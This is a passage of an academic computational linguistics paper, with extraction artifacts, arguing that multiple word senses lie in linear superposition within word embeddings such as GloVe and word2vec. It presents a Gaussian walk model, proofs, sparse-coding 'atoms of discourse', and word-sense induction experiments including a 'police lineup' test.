whereas recent neural network and energy-based models such as word2vec use an objective that in- volves a nonconvex (thus, also nonlinear) function of the word co-occurrences (Bengio et al., 2003; Mikolov et al., 2013a; Mikolov et al., 2013b). This nonlinearity makes it hard to discern how these modern embeddings capture the different senses of a polysemous word. The monolithic view of embeddings, with the internal information ex- tracted only via inner product, is felt to fail in cap- turing word senses (Griffiths et al., 2007; Reisinger and Mooney, 2010; Iacobacci et al., 2015). Re- searchers have instead sought to capture polysemy using more complicated representations, e.g., by in- ducing separate embeddings for each sense (Murphy et al., 2012; Huang et al., 2012). These embedding- per-sense representations grow naturally out of classic Word Sense Induction or WSI (Yarowsky, 1995; Schutze, 1998; Reisinger and Mooney, 2010; Di Marco and Navigli, 2013) techniques that per- form clustering on neighboring words. The current paper goes beyond this mono- lithic view, by describing how multiple senses of a word actually reside in linear superposi- tion within the standard word embeddings (e.g., word2vec (Mikolov et al., 2013a) and GloVe (Pen- nington et al., 2014)). By this we mean the follow- ing: consider a polysemous word, say tie, which can refer to an article of clothing, or a drawn match, or a physical act. Let’s take the usual viewpoint that tie is a single token that represents monosemous words tie1, tie2, .... The theory and experiments in this paper strongly suggest that word embeddings com- puted using modern techniques such as GloVe and word2vec satisfy: vtie ≈ α1 vtie1 + α2 vtie2 + α3 vtie3 + · · · (1) where coefficients αi’s are nonnegative and vtie1, vtie2, etc., are the hypothetical embeddings of 483 Transactions of the Association for Computational Linguistics, vol. 6, pp. 483–495, 2018. Action Editor: Hinrich Schütze. Submission batch: 11/2017; Revision batch: 3/2018; Published 7/2018. c©2018 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. the different senses—those that would have been induced in the thought experiment where all oc- currences of the different senses were hand-labeled in the corpus. This Linearity Assertion, whereby linear structure appears out of a highly nonlinear embedding technique, is explained theoretically in Section 2, and then empirically tested in a couple of ways in Section 4. Section 3 uses the linearity assertion to show how to do WSI via sparse coding, which can be seen as a linear algebraic analog of the classic clustering- based approaches, albeit with overlapping clusters. On standard testbeds it is competitive with earlier embedding-for-each-sense approaches (Section 6). A novelty of our WSI method is that it automat- ically links different senses of different words via our atoms of discourse (Section 3). This can be seen as an answer to the suggestion in (Reisinger and Mooney, 2010) to enhance one-embedding-per- sense methods so that they can automatically link together senses for different words, e.g., recognize that the “article of clothing” sense of tie is connected to shoe, jacket, etc. This paper is inspired by the solution of word analogies via linear algebraic methods (Mikolov et al., 2013b), and use of sparse coding on word em- beddings to get useful representations for many NLP tasks (Faruqui et al., 2015). Our theory builds conceptually upon the random walk on discourses model of Arora et al. (2016), although we make a small but important change to explain empirical findings regarding polysemy. Our WSI procedure applies (with minor variation in performance) to canonical embeddings such as word2vec and GloVe as well as the older vector space methods such as PMI (Church and Hanks, 1990). This is not surpris- ing since these embeddings are known to be interre- lated (Levy and Goldberg, 2014; Arora et al., 2016). 2 Justification for Linearity Assertion Since word embeddings are solutions to nonconvex optimization problems, at first sight it appears hope- less to reason about their finer structure. But it be- comes possible to do so using a generative model for language (Arora et al., 2016) — a dynamic versions by the log-linear topic model of (Mnih and Hinton, 2007)—which we now recall. It posits that at every point in the corpus there is a micro-topic (“what is being talked about”) called discourse that is drawn from the continuum of unit vectors in ℜd. The pa- rameters of the model include a vector vw ∈ ℜd for each word w. Each discourse c defines a distribution over words Pr[w | c] ∝ exp(c · vw). The model as- sumes that the corpus is generated by the slow geo- metric random walk of c over the unit sphere in ℜd : when the walk is at c, a few words are emitted by i.i.d. samples from the distribution (2), which, due to its log-linear form, strongly favors words close to c in cosine similarity. Estimates for learning parame- ters vw using MLE and moment methods correspond to standard embedding methods such as GloVe and word2vec (see the original paper). To study how word embeddings capture word senses, we’ll need to understand the relationship be- tween a word’s embedding and those of words it co-occurs with. In the next subsection, we pro- pose a slight modification to the above model and shows how to infer the embedding of a word from the embeddings of other words that co-occur with it. This immediately leads to the Linearity Assertion, as shown in Section 2.2. 2.1 Gaussian Walk Model As alluded to before, we modify the random walk model of (Arora et al., 2016) to the Gaussian ran- dom walk model. Again, the parameters of the model include a vector vw ∈ ℜd for each word w. The model assumes the corpus is generated as follows. First, a discourse vector c is drawn from a Gaussian with mean 0 and covariance Σ. Then, a window of n words w1, w2, . . . , wn are generated from c by: Pr[w1, w2, . . . , wn| c] = n∏ i=1 Pr[wi| c], (2) Pr[wi | c] = exp(c · vwi )/Zc, (3) where Zc = ∑ w exp(⟨vw, c⟩) is the partition func- tion. We also assume the partition function concen- trates in the sense that Zc ≈ Z exp(∥c∥2) for some constant Z. This is a direct extension of (Arora et al., 2016, Lemma 2.1) to discourse vectors with norm other than 1, and causes the additional term exp(∥c∥2).1 1The formal proof of (Arora et al., 2016) still applies in this setting. The simplest way to informally justify this assumption 484 Theorem 1. Assume the above generative model, and let s denote the random variable of a window of n words. Then, there is a linear transformation A such that vw ≈ A E [ 1 n ∑ wi∈s vwi | w ∈ s ] . Proof. Let cs be the discourse vector for the whole window s. By the law of total expectation, we have E [cs | w ∈ s] =E [E[cs | s = w1 . . . wj−1wwj+1 . . . wn] | w ∈ s] . (4) We evaluate the two sides of the equation. First, by Bayes’ rule and the assumptions on the distribution of c and the partition function, we have: p(c|w) ∝ p(w|c)p(c) ∝ 1 Zc exp(⟨vw, c⟩) · exp ( −1 2 c⊤Σ−1c ) ≈ 1 Z exp ( ⟨vw, c⟩− c⊤ ( 1 2 Σ−1 + I ) c ) . So c | w is a Gaussian distribution with mean E [c | w] ≈ (Σ−1 + 2I)−1vw. (5) Next, we compute E[c|w1, . . . , wn]. Again using Bayes’ rule and the assumptions on the distribution of c and the partition function, p(c|w1, . . . , wn) ∝ p(w1, . . . , wn|c)p(c) ∝ p(c) n∏ i=1 p(wi|c) ≈ 1 Zn exp ( n∑ i=1 v⊤wi c − c ⊤ ( 1 2 Σ−1 + nI ) c ) . So c|w1 . . . wn is a Gaussian distribution with mean E[c|w1, . . . , wn] ≈ ( Σ−1 + 2nI )−1 n∑ i=1 vwi . (6) Now plugging in equation (5) and (6) into equa- tion (4), we conclude that (Σ−1 + 2I)−1vw ≈ (Σ−1 + 2nI)−1E [ n∑ i=1 vwi | w ∈ s ] . is to assume vw are random vectors, and then Zc can be shown to concentrate around exp(∥c∥2). Such a condition enforces the word vectors to be isotropic to some extent, and makes the covariance of the discourse identifiable. Re-arranging the equation completes the proof with A = n(Σ−1 + 2I)(Σ−1 + 2nI)−1. Note: Interpretation. Theorem 1 shows that there exists a linear relationship between the vector of a word and the vectors of the words in its contexts. Consider the following thought experiment. First, choose a word w. Then, for each window s contain- ing w, take the average of the vectors of the words in s and denote it as vs. Now, take the average of vs for all the windows s containing w, and denote the average as u. Theorem 1 says that u can be mapped to the word vector vw by a linear transformation that does not depend on w. This linear structure may also have connections to some other phenomena related to linearity, e.g., Gittens et al. (2017) and Tian et al. (2017). Exploring such connections is left for future work. The linear transformation is closely related to Σ, which describes the distribution of the discourses. If we choose a coordinate system such that Σ is a diagonal matrix with diagonal entries λi, then A will also be a diagonal matrix with diagonal en- tries (n + 2nλi)/(1 + 2nλi). This is smoothing the spectrum and essentially shrinks the directions cor- responding to large λi relatively to the other direc- tions. Such directions are for common discourses and thus common words. Empirically, we indeed observe that A shrinks the directions of common words. For example, its last right singular vector has, as nearest neighbors, the vectors for words like “with”, “as”, and “the.” Note that empirically, A is not a diagonal matrix since the word vectors are not in the coordinate system mentioned. Note: Implications for GloVe and word2vec. Repeating the calculation in Arora et al. (2016) for our new generative model, we can show that the solutions to GloVe and word2vec training ob- jectives solve for the following vectors: v̂w =( Σ−1 + 4I )−1/2 vw. Since these other embeddings are the same as vw’s up to linear transformation, Theorem 1 (and the Linearity Assertion) still holds for them. Empirically, we find that ( Σ−1 + 4I )−1/2 is close to a scaled identity matrix (since ∥Σ−1∥2 is small), so v̂w’s can be used as a surrogate of vw’s. Experimental note: Using better sentence em- beddings, SIF embeddings. Theorem 1 implicitly uses the average of the neighboring word vectors as 485 an estimate (MLE) for the discourse vector. This estimate is of course also a simple sentence em- bedding, very popular in empirical NLP work and also reminiscent of word2vec’s training objective. In practice, this naive sentence embedding can be improved by taking a weighted combination (often tf-idf) of adjacent words. The paper (Arora et al., 2017) uses a simple twist to the generative model in (Arora et al., 2016) to provide a better estimate of the discourse c called SIF embedding, which is bet- ter for downstream tasks and surprisingly compet- itive with sophisticated LSTM-based sentence em- beddings. It is a weighted average of word em- beddings in the window, with smaller weights for more frequent words (reminiscent of tf-idf). This weighted average is the MLE estimate of c if above generative model is changed to: p(w|c) = αp(w) + (1 − α) exp(vw · c) Zc , where p(w) is the overall probability of word w in the corpus and α > 0 is a constant (hyperparameter). The theory in the current paper works with SIF embeddings as an estimate of the discourse c; in other words, in Theorem 1 we replace the average word vector with the SIF vector of that window. Em- pirically we find that it leads to similar results in test- ing our theory (Section 4) and better results in down- stream WSI applications (Section 6). Therefore, SIF embeddings are adopted in our experiments. 2.2 Proof of Linearity Assertion Now we use Theorem 1 to show how the Linear- ity Assertion follows. Recall the thought experiment considered there. Suppose word w has two distinct senses s1 and s2. Compute a word embedding vw for w. Then hand-replace each occurrence of a sense of w by one of the new tokens s1, s2 depending upon which one is being used. Next, train separate embed- dings for s1, s2 while keeping the other embeddings fixed. (NB: the classic clustering-based sense induc- tion (Schutze, 1998; Reisinger and Mooney, 2010) can be seen as an approximation to this thought ex- periment.) Theorem 2 (Main). Assuming the model of Sec- tion 2.1, embeddings in the thought experiment above will satisfy ∥vw − v̄w∥2 → 0 as the corpus length tends to infinity, where v̄w ≈ αvs1 + βvs2 for α = f1 f1 + f2 , β = f2 f1 + f2 , where f1 and f2 are the numbers of occurrences of s1, s2 in the corpus, respectively. Proof. Suppose we pick a random sample of N win- dows containing w in the corpus. For each window, compute the average of the word vectors and then apply the linear transformation in Theorem 1. The transformed vectors are i.i.d. estimates for vw, but with high probability about f1/(f1 + f2) fraction of the occurrences used sense s1 and f2/(f1 + f2) used sense s2, and the corresponding estimates for those two subpopulations converge to vs1 and vs2 respec- tively. Thus by construction, the estimate for vw is a linear combination of those for vs1 and vs2 . Note. Theorem 1 (and hence the Linearity Asser- tion) holds already for the original model in Arora et al. (2016) but with A = I, where I is the iden- tity transformation. In practice, we find inducing the word vector requires a non-identity A, which is the reason for the modified model of Section 2.1. This also helps to address a nagging issue hiding in older clustering-based approaches such as Reisinger and Mooney (2010) and Huang et al. (2012), which iden- tified senses of a polysemous word by clustering the sentences that contain it. One imagines a good rep- resentation of the sense of an individual cluster is simply the cluster center. This turns out to be false — the closest words to the cluster center sometimes are not meaningful for the sense that is being cap- tured; see Table 1. Indeed, the authors of Reisinger and Mooney (2010) seem aware of this because they mention “We do not assume that clusters correspond to traditional word senses. Rather, we only rely on clusters to capture meaningful variation in word usage.” We find that applying A to cluster centers makes them meaningful again. See also Table 1. 3 Towards WSI: Atoms of Discourse Now we consider how to do WSI using only word embeddings and the Linearity Assertion. Our ap- proach is fully unsupervised, and tries to induce senses for all words in one go, together with a vector representation for each sense. 486 center 1 before and provide providing a after providing provide opportunities provision center 2 before and a to the after access accessible allowing provide Table 1: Four nearest words for some cluster cen- ters that were computed for the word “access” by applying 5-means on the estimated discourse vec- tors (see Section 2.1) of 1000 random windows from Wikipedia containing “access”. After applying the linear transformation of Theorem 1 to the center, the nearest words become meaningful. Given embeddings for all words, it seems un- clear at first sight how to pin down the senses of tie using only (1) since vtie can be expressed in in- finitely many ways as such a combination, and this is true even if αi’s were known (and they aren’t). To pin down the senses we will need to interrelate the senses of different words, for example, relate the “article of clothing” sense tie1 with shoe, jacket, etc. To do so we rely on the generative model of Sec- tion 2.1 according to which unit vector in the em- bedding space corresponds to a micro-topic or dis- course. Empirically, discourses c and c′ tend to look similar to humans (in terms of nearby words) if their inner product is larger than 0.85, and quite different if the inner product is smaller than 0.5. So in the dis- cussion below, a discourse should really be thought of as a small region rather than a point. One imagines that the corpus has a “clothing” dis- course that has a high probability of outputting the tie1 sense, and also of outputting related words such as shoe, jacket, etc. By (2) the probability of be- ing output by a discourse is determined by the inner product, so one expects that the vector for “clothing” discourse has a high inner product with all of shoe, jacket, tie1, etc., and thus can stand as surrogate for vtie1 in (1)! Thus it may be sufficient to consider the following global optimization: Given word vectors {vw} in ℜd and two inte- gers k, m with k < m, find a set of unit vectors A1, A2, . . . , Am such that vw = m∑ j=1 αw,j Aj + ηw (7) where at most k of the coefficients αw,1, . . . , αw,m are nonzero, and ηw’s are error vectors. Here k is the sparsity parameter, and m is the number of atoms, and the optimization minimizes the norms of ηw’s (the ℓ2-reconstruction error): ∑ w ∥∥∥∥vw − m∑ j=1 αw,j Aj ∥∥∥∥ 2 2 . (8) Both Aj ’s and αw,j ’s are unknowns, and the opti- mization is nonconvex. This is just sparse coding, useful in neuroscience (Olshausen and Field, 1997) and also in image processing, computer vision, etc. This optimization is a surrogate for the desired ex- pansion of vtie as in (1), because one can hope that among A1, . . . , Am there will be directions corre- sponding to clothing, sports matches, etc., that will have high inner products with tie1, tie2, etc., re- spectively. Furthermore, restricting m to be much smaller than the number of words ensures that the typical Ai needs to be reused to express multiple words. We refer to Ai’s, discovered by this procedure, as atoms of discourse, since experimentation suggests that the actual discourse in a typical place in text (namely, vector c in (2)) is a linear combination of a small number, around 3-4, of such atoms. Implica- tions of this for text analysis are left for future work. Relationship to Clustering. Sparse coding is solved using alternating minimization to find the Ai’s that minimize (8). This objective function re- veals sparse coding to be a linear algebraic analogue of overlapping clustering, whereby the Ai’s act as cluster centers and each vw is assigned in a soft way to at most k of them (using the coefficients αw,j , of which at most k are nonzero). In fact this clustering viewpoint is also the basis of the alternating mini- mization algorithm. In the special case when k = 1, each vw has to be assigned to a single cluster, which is the familiar geometric clustering with squared ℓ2 distance. Similar overlapping clustering in a traditional graph-theoretic setup —clustering while simultane- ously cross-relating the senses of different words— seems more difficult but worth exploring. 4 Experimental Tests of Theory 4.1 Test of Gaussian Walk Model: Induced Embeddings Now we test the prediction of the Gaussian walk model suggesting a linear method to induce embed- 487 #paragraphs 250k 500k 750k 1 million cos similarity 0.94 0.95 0.96 0.96 Table 2: Fitting the GloVe word vectors with aver- age discourse vectors using a linear transformation. The first row is the number of paragraphs used to compute the discourse vectors, and the second row is the average cosine similarities between the fitted vectors and the GloVe vectors. dings from the context of a word. Start with the GloVe embeddings; let vw denote the embedding for w. Randomly sample many paragraphs from Wikipedia, and for each word w′ and each occur- rence of w′ compute the SIF embedding of text in the window of 20 words centered around w′. Aver- age the SIF embeddings for all occurrences of w′ to obtain vector uw′ . The Gaussian walk model says that there is a linear transformation that maps uw′ to vw′ , so solve the regression: argminA ∑ w ∥Auw − vw∥22. (9) We call the vectors Auw the induced embeddings. We can test this method of inducing embeddings by holding out 1/3 words randomly, doing the regres- sion (9) on the rest, and computing the cosine sim- ilarities between Auw and vw on the heldout set of words. Table 2 shows that the average cosine similar- ity between the induced embeddings and the GloVe vectors is large. By contrast the average similar- ity between the average discourse vectors and the GloVe vectors is much smaller (about 0.58), illus- trating the need for the linear transformation. Sim- ilar results are observed for the word2vec and SN vectors (Arora et al., 2016). 4.2 Test of Linearity Assertion We do two empirical tests of the Linearity Assertion (Theorem 2). Test 1. The first test involves the classic artificial polysemous words (also called pseudowords). First, pre-train a set W1 of word vectors on Wikipedia with existing embedding methods. Then, randomly pick m pairs of non-repeated words, and for each pair, replace each occurrence of either of the two words m pairs 10 103 3 · 104 relative error SN 0.32 0.63 0.67 GloVe 0.29 0.32 0.51 cos similarity SN 0.90 0.72 0.75 GloVe 0.91 0.91 0.77 Table 3: The average relative errors and cosine sim- ilarities between the vectors of pseudowords and those predicted by Theorem 2. m pairs of words are randomly selected and for each pair, all occurrences of the two words in the corpus is replaced by a pseu- doword. Then train the vectors for the pseudowords on the new corpus. with a pseudoword. Third, train a set W2 of vectors on the new corpus, while holding fixed the vectors of words that were not involved in the pseudowords. Construction has ensured that each pseudoword has two distinct “senses”, and we also have in W1 the “ground truth” vectors for those senses.2 Theorem 2 implies that the embedding of a pseudoword is a lin- ear combination of the sense vectors, so we can com- pare this predicted embedding to the one learned in W2.3 Suppose the trained vector for a pseudoword w is uw and the predicted vector is vw, then the comparison criterion is the average relative error 1 |S| ∑ w∈S ∥uw−vw∥22 ∥vw∥22 where S is the set of all the pseudowords. We also report the average cosine similarity between vw’s and uw’s. Table 3 shows the results for the GloVe and SN (Arora et al., 2016) vectors, averaged over 5 runs. When m is small, the error is small and the co- sine similarity is as large as 0.9. Even if m = 3 ·104 2Note that this discussion assumes that the set of pseu- dowords is small, so that a typical neighborhood of a pseu- doword does not consist of other pseudowords. Otherwise the ground truth vectors in W1 become a bad approximation to the sense vectors. 3Here W2 is trained while fixing the vectors of words not involved in pseudowords to be their pre-trained vectors in W1. We can also train all the vectors in W2 from random initializa- tion. Such W2 will not be aligned with W1. Then we can learn a linear transformation from W2 to W1 using the vectors for the words not involved in pseudowords, apply it on the vectors for the pseudowords, and compare the transformed vectors to the predicted ones. This is tested on word2vec, resulting in relative errors between 20% and 32%, and cosine similarities between 0.86 and 0.92. These results again support our analysis. 488 vector type GloVe skip-gram SN cosine 0.72 0.73 0.76 Table 4: The average cosine of the angles between the vectors of words and the span of vector represen- tations of its senses. The words tested are those in the WSI task of SemEval 2010. (i.e., about 90% of the words in the vocabulary are replaced by pseudowords), the cosine similarity re- mains above 0.7, which is significant in the 300 di- mensional space. This provides positive support for our analysis. Test 2. The second test is a proxy for what would be a complete (but laborious) test of the Linearity Assertion: replicating the thought experiment while hand-labeling sense usage for many words in a cor- pus. The simpler proxy is as follows. For each word w, WordNet (Fellbaum, 1998) lists its vari- ous senses by providing definition and example sen- tences for each sense. This is enough text (roughly a paragraph’s worth) for our theory to allow us to represent it by a vector —specifically, apply the SIF sentence embedding followed by the linear transfor- mation learned as in Section 4.1. The text embed- ding for sense s should approximate the ground truth vector vs for it. Then the Linearity Assertion pre- dicts that embedding vw lies close to the subspace spanned by the sense vectors. (Note that this is a nontrivial event: in 300 dimensions a random vector will be quite far from the subspace spanned by some 3 other random vectors.) Table 4 checks this predic- tion using the polysemous words appearing in the WSI task of SemEval 2010. We tested three stan- dard word embedding methods: GloVe, the skip- gram variant of word2vec, and SN (Arora et al., 2016). The results show that the word vectors are quite close to the subspace spanned by the senses. 5 Experiments with Atoms of Discourse The experiments use 300-dimensional embeddings created using the SN objective in (Arora et al., 2016) and a Wikipedia corpus of 3 billion tokens (Wikime- dia, 2012), and the sparse coding is solved by stan- dard k-SVD algorithm (Damnjanovic et al., 2010). Experimentation showed that the best sparsity pa- rameter k (i.e., the maximum number of allowed senses per word) is 5, and the number of atoms m is about 2000. For the number of senses k, we tried plausible alternatives (based upon suggestions of many colleagues) that allow k to vary for differ- ent words, for example to let k be correlated with the word frequency. But a fixed choice of k = 5 seems to produce just as good results. To understand why, realize that this method retains no information about the corpus except for the low dimensional word em- beddings. Since the sparse coding tends to express a word using fairly different atoms, examining (7) shows that ∑ j α 2 w,j is bounded by approximately ∥vw∥22. So if too many αw,j ’s are allowed to be nonzero, then some must necessarily have small co- efficients, which makes the corresponding compo- nents indistinguishable from noise. In other words, raising k often picks not only atoms corresponding to additional senses, but also many that don’t. The best number of atoms m was found to be around 2000. This was estimated by re-running the sparse coding algorithm multiple times with dif- ferent random initializations, whereupon substantial overlap was found between the two bases: a large fraction of vectors in one basis were found to have a very close vector in the other. Thus combining the bases while merging duplicates yielded a basis of about the same size. Around 100 atoms are used by a large number of words or have no close-by words. They appear semantically meaningless and are ex- cluded by checking for this condition.4 The content of each atom can be discerned by looking at the nearby words in cosine similarity. Some examples are shown in Table 5. Each word is represented using at most five atoms, which usually capture distinct senses (with some noise/mistakes). The senses recovered for tie and spring are shown in Table 6. Similar results can be obtained by using other word embeddings like word2vec and GloVe. We also observe sparse coding procedures assign nonnegative values to most coefficients αw,j ’s even if they are left unrestricted. Probably this is because the appearances of a word are best explained by what discourse is being used to generate it, rather than what discourses are not being used. 4We think semantically meaningless atoms —i.e., unex- plained inner products—exist because a simple language model such as ours cannot explain all observed co-occurrences due to grammar, stopwords, etc. It ends up needing smoothing terms. 489 Atom 1978 825 231 616 1638 149 330 drowning instagram stakes membrane slapping orchestra conferences suicides twitter thoroughbred mitochondria pulling philharmonic meetings overdose facebook guineas cytosol plucking philharmonia seminars murder tumblr preakness cytoplasm squeezing conductor workshops poisoning vimeo filly membranes twisting symphony exhibitions commits linkedin fillies organelles bowing orchestras organizes stabbing reddit epsom endoplasmic slamming toscanini concerts strangulation myspace racecourse proteins tossing concertgebouw lectures gunshot tweets sired vesicles grabbing solti presentations Table 5: Some discourse atoms and their nearest 9 words. By Equation (2), words most likely to appear in a discourse are those nearest to it. tie spring trousers season scoreline wires operatic beginning dampers flower creek humid blouse teams goalless cables soprano until brakes flowers brook winters waistcoat winning equaliser wiring mezzo months suspension flowering river summers skirt league clinching electrical contralto earlier absorbers fragrant fork ppen sleeved finished scoreless wire baritone year wheels lilies piney warm pants championship replay cable coloratura last damper flowered elk temperatures Table 6: Five discourse atoms linked to the words tie and spring. Each atom is represented by its nearest 6 words. The algorithm often makes a mistake in the last atom (or two), as happened here. Relationship to Topic Models. Atoms of discourse may be reminiscent of results from other automated methods for obtaining a thematic understanding of text, such as topic modeling, described in the sur- vey by Blei (2012). This is not surprising since the model (2) used to compute the embeddings is re- lated to a log-linear topic model by Mnih and Hinton (2007). However, the discourses here are computed via sparse coding on word embeddings, which can be seen as a linear algebraic alternative, resulting in fairly fine-grained topics. Atoms are also reminis- cent of coherent “word clusters” detected in the past using Brown clustering, or even sparse coding (Mur- phy et al., 2012). The novelty in this paper is a clear interpretation of the sparse coding results as atoms of discourse, as well as its use to capture different word senses. 6 Testing WSI in Applications While the main result of the paper is to reveal the linear algebraic structure of word senses within ex- isting embeddings, it is desirable to verify that this view can yield results competitive with earlier sense embedding approaches. We report some tests be- low. We find that common word embeddings per- form similarly with our method; for concreteness we use induced embeddings described in Section 4.1. They are evaluated in three tasks: word sense induc- tion task in SemEval 2010 (Manandhar et al., 2010), word similarity in context (Huang et al., 2012), and a new task we called police lineup test. The results are compared to those of existing embedding based approaches reported in related work (Huang et al., 2012; Neelakantan et al., 2014; Mu et al., 2017). 6.1 Word Sense Induction In the WSI task in SemEval 2010, the algorithm is given a polysemous word and about 40 pieces of texts, each using it according to a single sense. The algorithm has to cluster the pieces of text so that those with the same sense are in the same cluster. The evaluation criteria are F-score (Artiles et al., 2009) and V-Measure (Rosenberg and Hirschberg, 2007). The F-score tends to be higher with a smaller number of clusters and the V-Measure tends to be higher with a larger number of clusters, and fair eval- uation requires reporting both. Given a word and its example texts, our algorithm uses a Bayesian analysis dictated by our theory to 490 compute a vector uc for each piece of text c and and then applies k-means on these vectors, with the small twist that sense vectors are assigned to near- est centers based on inner products rather than Eu- clidean distances. Table 7 shows the results. Computing vector uc. For word w we start by com- puting its expansion in terms of atoms of discourse (see (8) in Section 3). In an ideal world the nonzero coefficients would exactly capture its senses, and each text containing w would match to one of these nonzero coefficients. In the real world such deter- ministic success is elusive and one must reason us- ing Bayes’ rule. For each atom a, word w and text c there is a joint distribution p(w, a, c) describing the event that atom a is the sense being used when word w was used in text c. We are interested in the posterior distribution: p(a|c, w) ∝ p(a|w)p(a|c)/p(a). (10) We approximate p(a|w) using Theorem 2, which suggests that the coefficients in the expansion of vw with respect to atoms of discourse scale according to probabilities of usage. (This assertion involves ig- noring the low-order terms involving the logarithm in the theorem statement.) Also, by the random walk model, p(a|c) can be approximated by exp(⟨va, vc⟩) where vc is the SIF embedding of the context. Fi- nally, since p(a) = Ec[p(a|c)], it can be empirically estimated by randomly sampling c. The posterior p(a|c, w) can be seen as a soft de- coding of text c to atom a. If texts c1, c2 both contain w, and they were hard decoded to atoms a1, a2 re- spectively then their similarity would be ⟨va1 , va2⟩. With our soft decoding, the similarity can be defined by taking the expectation over the full posterior: similarity(c1, c2) = Eai∼p(a|ci,w),i∈{1,2}⟨va1 , va2⟩, (11) = ⟨ ∑ a1 p(a1|c1, w)va1 , ∑ a2 p(a2|c2, w)va2 ⟩ . At a high level this is analogous to the Bayesian polysemy model of Reisinger and Mooney (2010) and Brody and Lapata (2009), except that they in- troduced separate embeddings for each sense clus- ter, while here we are working with structure already existing inside word embeddings. Method V-Measure F-Score (Huang et al., 2012) 10.60 38.05 (Neelakantan et al., 2014) 9.00 47.26 (Mu et al., 2017), k = 2 7.30 57.14 (Mu et al., 2017), k = 5 14.50 44.07 ours, k = 2 6.1 58.55 ours, k = 3 7.4 55.75 ours, k = 4 9.9 51.85 ours, k = 5 11.5 46.38 Table 7: Performance of different vectors in the WSI task of SemEval 2010. The parameter k is the num- ber of clusters used in the methods. Rows are di- vided into two blocks, the first of which shows the results of the competitors, and the second shows those of our algorithm. Best results in each block are in boldface. The last equation suggests defining the vector uc for the text c as uc = ∑ a p(a|c, w)va, (12) which allows the similarity between two text pieces to be expressed via the inner product of their vectors. Results. The results are reported in Table 7. Our approach outperforms the results by Huang et al. (2012) and Neelakantan et al. (2014). When com- pared to Mu et al. (2017), for the case with 2 centers, we achieved better V-measure but lower F-score, while for 5 centers, we achieved lower V-measure but better F-score. 6.2 Word Similarity in Context The dataset consists of around 2000 pairs of words, along with the contexts the words occur in and the ground-truth similarity scores. The evaluation cri- terion is the correlation between the ground-truth scores and the predicted ones. Our method computes the estimated sense vectors and then the similarity as in Section 6.1. We compare to the baselines that sim- ply use the cosine similarity of the GloVe/skip-gram vectors, and also to the results of several existing sense embedding methods. Results. Table 8 shows that our result is better than those of the baselines and Mu et al. (2017), but slightly worse than that of Huang et al. (2012). 491 Method Spearman coefficient GloVe 0.573 skip-gram 0.622 (Huang et al., 2012) 0.657 (Neelakantan et al., 2014) 0.567 (Mu et al., 2017) 0.637 ours 0.652 Table 8: The results for different methods in the task of word similarity in context. The best result is in boldface. Our result is close to the best. Note that Huang et al. (2012) retrained the vectors for the senses on the corpus, while our method de- pends only on senses extracted from the off-the-shelf vectors. After all, our goal is to show word senses already reside within off-the-shelf word vectors. 6.3 Police Lineup Evaluating WSI systems can run into well-known difficulties, as reflected in the changing metrics over the years (Navigli and Vannella, 2013). Inspired by word-intrusion tests for topic coherence (Chang et al., 2009), we proposed a new simple test, which has the advantages of being easy to understand, and ca- pable of being administered to humans. The testbed uses 200 polysemous words and their 704 senses according to WordNet. Each sense is represented by 8 related words, which were col- lected from WordNet and online dictionaries by col- lege students, who were told to identify most rele- vant other words occurring in the online definitions of this word sense as well as in the accompany- ing illustrative sentences. These are considered as ground truth representation of the word sense. These 8 words are typically not synonyms. For example, for the tool/weapon sense of axe they were “handle, harvest, cutting, split, tool, wood, battle, chop.” The quantitative test is called police lineup. First, randomly pick one of these 200 polysemous words. Second, pick the true senses for the word and then add randomly picked senses from other words so that there are n senses in total, where each sense is represented by 8 related words as mentioned. Fi- nally, the algorithm (or human) is given the polyse- mous word and a set of n senses, and has to identify the true senses in this set. Table 9 gives an example. word senses bat 1 navigate nocturnal mouse wing cave sonic fly dark 2 used hitting ball game match cricket play baseball 3 wink briefly shut eyes wink bate quickly action 4 whereby legal court law lawyer suit bill judge 5 loose ends two loops shoelaces tie rope string 6 horny projecting bird oral nest horn hard food Table 9: An example of the police lineup test with n = 6. The algorithm (or human subject) is given the polysemous word “bat” and n = 6 senses each of which is represented as a list of words, and is asked to identify the true senses belonging to “bat” (high- lighted in boldface for demonstration). Algorithm 1 Our method for the police lineup test Input: Word w, list S of senses (each has 8 words) Output: t senses out of S 1: Heuristically find inflectional forms of w. 2: Find 5 atoms for w and each inflectional form. Let U denote the union of all these atoms. 3: Initialize the set of candidate senses Cw ← ∅, and the score for each sense L to score(L) ←−∞ 4: for each atom a ∈ U do 5: Rank senses L ∈ S by score(a, L) = s(a, L)−sLA + s(w, L) − sLV 6: Add the two senses L with highest score(a, L) to Cw, and update their scores score(L) ← max{score(L), score(a, L)} 7: Return the t senses L ∈ Cs with highest score(L) Our method (Algorithm 1) uses the similarities between any word (or atom) x and a set of words Y , defined as s(x, Y ) = ⟨vx, vY ⟩ where vY is the SIF embedding of Y . It also uses the average simi- larities: sYA = ∑ a∈A s(a, Y ) |A| , s Y V = ∑ w∈V s(w, Y ) |V | where A are all the atoms, and V are all the words. We note two important practical details. First, while we have been using atoms of discourse as a proxy for word sense, these are too coarse-grained: the to- tal number of senses (e.g., WordNet synsets) is far greater than 2000. Thus the score(·) function uses both the atom and the word vector. Second, some words are more popular than the others—i.e., have large components along many atoms and words— which seems to be an instance of the smoothing 492 0 0.2 0.4 0.6 0.8 1 Recall 0 0.2 0.4 0.6 0.8 1 P re c is io n Our method Mu et al, 2017 word2vec Native speaker Non-native speaker 10 20 30 40 50 60 70 80 Number of meanings m 0 0.2 0.4 0.6 0.8 1 Recall Precision A B Figure 1: Precision and recall in the police lineup test. (A) For each polysemous word, a set of n = 20 senses containing the ground truth senses of the word are presented. Human subjects are told that on average each word has 3.5 senses and were asked to choose the senses they thought were true. The algorithms select t senses for t = 1, 2, . . . , 6. For each t, each algorithm was run 5 times (standard deviations over the runs are too small to plot). (B) The performance of our method for t = 4 and n = 20, 30, . . . , 70. phenomenon alluded to in Footnote 4. The penalty terms sLA and s L V lower the scores of senses L con- taining such words. Finally, our algorithm returns t senses where t can be varied. Results. The precision and recall for different n and t (number of senses the algorithm returns) are pre- sented in Figure 1. Our algorithm outperforms the two selected competitors. For n = 20 and t = 4, our algorithm succeeds with precision 65% and re- call 75%, and performance remains reasonable for n = 50. Giving the same test to humans5 for n = 20 (see the left figure) suggests that our method per- forms similarly to non-native speakers. Other word embeddings can also be used in the test and achieved slightly lower performance. For n = 20 and t = 4, the precision/recall are lower by the following amounts: GloVe 2.3%/5.76%, NNSE (matrix factorization on PMI to rank 300 by Murphy et al. (2012)) 25%/28%. 7 Conclusions Different senses of polysemous words have been shown 